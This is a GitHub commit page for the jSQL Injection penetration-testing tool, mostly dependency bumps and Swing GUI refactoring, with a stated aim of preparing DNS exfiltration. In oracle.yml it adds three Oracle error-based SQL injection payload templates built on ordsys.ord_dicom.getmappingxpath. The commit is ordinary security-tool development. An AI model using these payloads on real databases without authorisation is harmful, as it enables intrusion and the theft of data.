Skip to content

Commit 67afe48

Browse files
ron190ron190
committed
Optimize GUI, prepare for DNS exfiltration
- Add oracle Error strategy `getmappingxpath()` - Use zero size split panes - Fixes #96199 - Bump dependencies
1 parent 12e55f5 commit 67afe48

File tree

12 files changed

+151
-26
lines changed

12 files changed

+151
-26
lines changed

model/pom.xml

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -53,23 +53,23 @@
5353
<awaitility.version>4.3.0</awaitility.version>
5454
<bootstrap.version>5.3.5</bootstrap.version>
5555
<!-- required since commons-text:1.11.0 not working -->
56-
<commons-lang3.version>3.17.0</commons-lang3.version>
56+
<commons-lang3.version>3.18.0</commons-lang3.version>
5757
<cubrid-jdbc.version>11.3.1.0050</cubrid-jdbc.version>
5858
<dnsjava.version>3.6.3</dnsjava.version>
59-
<gmavenplus-plugin.version>4.2.0</gmavenplus-plugin.version>
59+
<gmavenplus-plugin.version>4.2.1</gmavenplus-plugin.version>
6060
<graphql-java-tools.version>5.2.4</graphql-java-tools.version>
6161
<graphql-spring-boot-starter.version>5.0.2</graphql-spring-boot-starter.version>
6262
<groovy-test-junit5.version>4.0.13</groovy-test-junit5.version>
6363
<h2.version>2.3.232</h2.version>
6464
<hsqldb.version>2.7.4</hsqldb.version>
6565
<informix.jdbc.version>15.0.0.1.1</informix.jdbc.version>
6666
<jaxb-api.version>2.1</jaxb-api.version>
67-
<jaybird.version>6.0.1</jaybird.version>
67+
<jaybird.version>6.0.3</jaybird.version>
6868
<jcabi-log.version>0.24.3</jcabi-log.version>
6969
<jna.version>5.17.0</jna.version>
7070
<jquery.version>3.7.1</jquery.version>
7171
<json.version>20250107</json.version>
72-
<jsoup.version>1.19.1</jsoup.version>
72+
<jsoup.version>1.20.1</jsoup.version>
7373
<junit-pioneer.version>2.3.0</junit-pioneer.version>
7474
<juniversalchardet.version>1.0.3</juniversalchardet.version>
7575
<maven-failsafe-plugin.version>3.5.3</maven-failsafe-plugin.version>
@@ -81,7 +81,7 @@
8181
<mysql-connector-j.version>9.2.0</mysql-connector-j.version>
8282
<nashorn-core.version>15.6</nashorn-core.version>
8383
<!-- failure with 5.28.2 -->
84-
<neo4j-java-driver.version>5.27.0</neo4j-java-driver.version>
84+
<neo4j-java-driver.version>6.0.1</neo4j-java-driver.version>
8585
<neo4j-jdbc-driver.version>4.0.10</neo4j-jdbc-driver.version>
8686
<ojdbc8.version>23.8.0.25.04</ojdbc8.version>
8787
<pitest-junit5-plugin.version>1.2.2</pitest-junit5-plugin.version>
@@ -95,7 +95,7 @@
9595
<sqlite-dialect.version>0.1.4</sqlite-dialect.version>
9696
<stomp-websocket.version>2.3.4</stomp-websocket.version>
9797
<sybase-jconn4.version>16.0</sybase-jconn4.version>
98-
<vertica-jdbc.version>24.4.0-0</vertica-jdbc.version>
98+
<vertica-jdbc.version>25.3.0-0</vertica-jdbc.version>
9999
</properties>
100100

101101
<dependencyManagement>

model/src/main/java/com/jsql/util/TamperingUtil.java

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -97,8 +97,8 @@ public String tamper(String sqlQueryDefault) {
9797

9898
sqlQuery = lead + sqlQuery + trail;
9999

100-
String regexToremoveTamperTags = String.format("(?i)%s|%s", TamperingUtil.TAG_OPENED, TamperingUtil.TAG_CLOSED);
101-
sqlQuery = sqlQuery.replaceAll(regexToremoveTamperTags, StringUtils.EMPTY);
100+
String regexToRemoveTamperTags = String.format("(?i)%s|%s", TamperingUtil.TAG_OPENED, TamperingUtil.TAG_CLOSED);
101+
sqlQuery = sqlQuery.replaceAll(regexToRemoveTamperTags, StringUtils.EMPTY);
102102

103103
// Empty when checking character insertion
104104
if (StringUtils.isEmpty(sqlQuery)) {

model/src/main/resources/vendor/oracle.yml

Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -281,6 +281,28 @@ strategy:
281281
)) from dual
282282
capacity: 481
283283

284+
- name: Dicom:or
285+
query: |
286+
/* ORA-53044: invalid tag: <sqli> */
287+
or 1=ordsys.ord_dicom.getmappingxpath((
288+
${window}
289+
))
290+
capacity: 481
291+
292+
- name: Dicom:and
293+
query: |
294+
and 1=ordsys.ord_dicom.getmappingxpath((
295+
${window}
296+
))
297+
capacity: 481
298+
299+
- name: Dicom:stack
300+
query: |
301+
; select ordsys.ord_dicom.getmappingxpath((
302+
${window}
303+
)) from dual
304+
capacity: 481
305+
284306
- name: Sqlhash:or
285307
query: |
286308
/* ORA-13797: invalid SQL Id specified, <sqli> */

pom.xml

Lines changed: 2 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -22,11 +22,9 @@
2222
<sonar.java.binaries>target/classes</sonar.java.binaries>
2323
<sonar.java.source>11</sonar.java.source>
2424

25-
<commons-text.version>1.13.1</commons-text.version>
25+
<commons-text.version>1.14.0</commons-text.version>
2626
<flatten-maven-plugin.version>1.7.0</flatten-maven-plugin.version>
2727
<jacoco-maven-plugin.version>0.8.13</jacoco-maven-plugin.version>
28-
<!-- False positive: GData Java.Exploit.CVE-2021-44228.N Acronis (Static ML) -->
29-
<!-- Fixed since Apache Log4j Core - 2.15.0 -->
3028
<log4j-bom.version>2.24.3</log4j-bom.version>
3129
<maven-antrun-plugin.version>3.1.0</maven-antrun-plugin.version>
3230
<maven-assembly-plugin.version>3.7.1</maven-assembly-plugin.version>
@@ -44,7 +42,7 @@
4442
<maven-release-plugin.version>3.1.1</maven-release-plugin.version>
4543
<maven-site-plugin.version>4.0.0-M16</maven-site-plugin.version>
4644
<maven-surefire-plugin.version>3.5.3</maven-surefire-plugin.version>
47-
<pitest-maven.version>1.19.1</pitest-maven.version>
45+
<pitest-maven.version>1.20.4</pitest-maven.version>
4846
<spotbugs-maven-plugin.version>4.9.3.0</spotbugs-maven-plugin.version>
4947
<versions-maven-plugin.version>2.18.0</versions-maven-plugin.version>
5048

view/pom.xml

Lines changed: 6 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@
1212
<properties>
1313
<assertj-swing-junit.version>3.17.1</assertj-swing-junit.version>
1414
<commons-io.version>2.19.0</commons-io.version>
15-
<flatlaf.version>3.6</flatlaf.version>
15+
<flatlaf.version>3.6.1</flatlaf.version>
1616
<junit-jupiter-engine.version>5.12.2</junit-jupiter-engine.version>
1717
<maven-shade-plugin.version>3.6.0</maven-shade-plugin.version>
1818
<maven-assembly-plugin.version>3.7.1</maven-assembly-plugin.version>
@@ -22,6 +22,11 @@
2222
</properties>
2323

2424
<dependencies>
25+
<dependency>
26+
<groupId>dnsjava</groupId>
27+
<artifactId>dnsjava</artifactId>
28+
<version>3.6.3</version>
29+
</dependency>
2530
<dependency>
2631
<groupId>${project.groupId}</groupId>
2732
<artifactId>model</artifactId>

view/src/main/java/com/jsql/view/swing/action/ActionCloseTabResult.java

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -21,7 +21,7 @@ public static void perform(int closeTabNumber) {
2121

2222
if (MediatorHelper.tabResults().getTabCount() == 0) {
2323
var splitPaneTopBottom = MediatorHelper.frame().getSplitNS();
24-
JSplitPane splitPaneLeftRight = splitPaneTopBottom.getSplitEW();
24+
var splitPaneLeftRight = splitPaneTopBottom.getSplitEW();
2525
int dividerLocation = splitPaneLeftRight.getDividerLocation();
2626

2727
var label = new JLabel(UiUtil.APP_BIG.getIcon());

view/src/main/java/com/jsql/view/swing/manager/ManagerCoder.java

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,6 +18,7 @@
1818
import com.jsql.view.swing.text.JTextAreaPlaceholder;
1919
import com.jsql.view.swing.text.listener.DocumentListenerEditing;
2020
import com.jsql.view.swing.util.I18nViewUtil;
21+
import com.jsql.view.swing.util.JSplitPaneWithZeroSizeDivider;
2122
import com.jsql.view.swing.util.UiUtil;
2223

2324
import javax.swing.*;
@@ -100,7 +101,7 @@ public void process() {
100101
var bottom = new JPanel(new BorderLayout());
101102
bottom.add(new JScrollPane(this.result), BorderLayout.CENTER);
102103

103-
var divider = new JSplitPane(JSplitPane.VERTICAL_SPLIT);
104+
var divider = new JSplitPaneWithZeroSizeDivider(JSplitPane.VERTICAL_SPLIT);
104105
divider.setResizeWeight(0.5);
105106
divider.setTopComponent(topMixed);
106107
divider.setBottomComponent(bottom);

view/src/main/java/com/jsql/view/swing/panel/PanelConsoles.java

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -24,6 +24,7 @@
2424
import com.jsql.view.swing.text.JTextAreaPlaceholderConsole;
2525
import com.jsql.view.swing.text.JToolTipI18n;
2626
import com.jsql.view.swing.util.I18nViewUtil;
27+
import com.jsql.view.swing.util.JSplitPaneWithZeroSizeDivider;
2728
import com.jsql.view.swing.util.MediatorHelper;
2829
import com.jsql.view.swing.util.UiUtil;
2930
import org.apache.commons.lang3.StringUtils;
@@ -99,7 +100,7 @@ public PanelConsoles() {
99100
}
100101

101102
private void initSplit() {
102-
this.networkSplitPane = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT);
103+
this.networkSplitPane = new JSplitPaneWithZeroSizeDivider(JSplitPane.HORIZONTAL_SPLIT);
103104
this.networkSplitPane.setDividerLocation(600);
104105
this.networkSplitPane.setPreferredSize(new Dimension(0,0)); // required for correct scroll placement
105106

view/src/main/java/com/jsql/view/swing/panel/split/SplitNS.java

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -10,6 +10,7 @@
1010
******************************************************************************/
1111
package com.jsql.view.swing.panel.split;
1212

13+
import com.jsql.view.swing.util.JSplitPaneWithZeroSizeDivider;
1314
import com.jsql.model.InjectionModel;
1415
import com.jsql.util.I18nUtil;
1516
import com.jsql.util.PreferencesUtil;
@@ -28,12 +29,12 @@
2829
/**
2930
* SplitPane composed of tree and tabs on top, and info tabs on bottom.
3031
*/
31-
public class SplitNS extends JSplitPane {
32+
public class SplitNS extends JSplitPaneWithZeroSizeDivider {
3233

3334
/**
3435
* SplitPane containing Manager panels on the left and result tabs on the right.
3536
*/
36-
private final JSplitPane splitEW = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT);
37+
private final JSplitPane splitEW = new JSplitPaneWithZeroSizeDivider(JSplitPane.HORIZONTAL_SPLIT);
3738

3839
private static final JPanel PANEL_HIDDEN_CONSOLES = new JPanel();
3940

view/src/main/java/com/jsql/view/swing/terminal/EmptyFocusCopy.java

Lines changed: 7 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,8 @@
11
package com.jsql.view.swing.terminal;
22

3-
import com.jsql.model.exception.JSqlRuntimeException;
3+
import com.jsql.util.LogLevelUtil;
4+
import org.apache.logging.log4j.LogManager;
5+
import org.apache.logging.log4j.Logger;
46

57
import java.awt.*;
68
import java.awt.datatransfer.DataFlavor;
@@ -15,6 +17,8 @@
1517
*/
1618
public class EmptyFocusCopy implements MouseListener {
1719

20+
private static final Logger LOGGER = LogManager.getRootLogger();
21+
1822
private final AbstractExploit abstractExploit;
1923

2024
public EmptyFocusCopy(AbstractExploit abstractExploit) {
@@ -35,8 +39,8 @@ private void pasteClipboard() {
3539
try {
3640
String data = (String) Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor);
3741
this.abstractExploit.append(data);
38-
} catch (UnsupportedFlavorException | IOException ex) {
39-
throw new JSqlRuntimeException(ex);
42+
} catch (UnsupportedFlavorException | IOException e) {
43+
LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e);
4044
}
4145
}
4246

0 commit comments

Comments
 (0)